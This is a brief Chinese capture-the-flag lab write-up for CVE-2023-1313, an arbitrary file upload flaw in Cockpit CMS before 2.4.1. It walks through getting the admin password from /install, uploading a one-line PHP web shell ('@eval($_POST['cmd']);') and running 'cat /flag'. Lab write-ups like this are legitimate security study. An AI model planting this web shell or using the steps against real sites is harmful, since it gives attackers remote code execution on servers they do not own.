宇宙级免责声明!!
!!!注意:本文章仅用于学习交流,请勿用于非法用途!!!
【春秋云镜】CVE-2023-1313 漏洞实战 难度指数:极其容易
0x01 漏洞概述
cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装
0x02 漏洞复现
1. 打开靶场
2. 漏洞利用
- 根据提示打开/install查看admin密码
- 查看网站使用的语言
这里可以看到是PHP
- 看到文件上传的地方,这里很轻松的上传了上去
这里使用一句话木马 + cat /flag
1 | @eval($_POST['cmd']); |
- 复制外部链接
- 打开脚本所在的链接,回显得到flag
关于本文
由 Jimmy Ki 撰写, 采用 CC BY-NC 4.0 许可协议.